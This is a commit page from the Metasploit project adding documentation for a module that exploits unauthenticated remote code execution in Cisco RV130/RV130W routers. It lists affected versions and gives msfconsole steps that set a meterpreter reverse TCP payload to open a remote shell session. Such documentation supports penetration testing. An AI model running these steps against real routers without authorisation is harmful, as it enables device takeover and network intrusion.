Land #11613, Cisco RV130 stack BOF exploit
This commit is contained in:
William Vu
@@ -0,0 +1,27 @@
|
||||
# Cisco RV130W Routers Management Interface Remote Command Execution
|
||||
|
||||
A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.
|
||||
|
||||
The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.
|
||||
|
||||
A successful exploit could allow the attacker to execute arbitrary code on the underlying operating
|
||||
system of the affected device as a high-privilege user.
|
||||
|
||||
## Vulnerable Device
|
||||
|
||||
* RV130 Multifunction VPN Router versions prior to 1.0.3.45 are affected.
|
||||
* RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.
|
||||
|
||||
This exploit was specifically written against version 1.0.3.28. To test, you can find the
|
||||
firmware here: https://software.cisco.com/download/home/285026141/type/282465789/release/1.0.3.28
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. ```use exploit/linux/http/cisco_rv130_rmi_rce```
|
||||
3. ```set rhost [IP]```
|
||||
4. ```set payload linux/armle/meterpreter_reverse_tcp```
|
||||
5. ```set lhost [IP]```
|
||||
6. ```exploit```
|
||||
7. You should get a session
|
||||
|
||||
Reference in New Issue
Block a user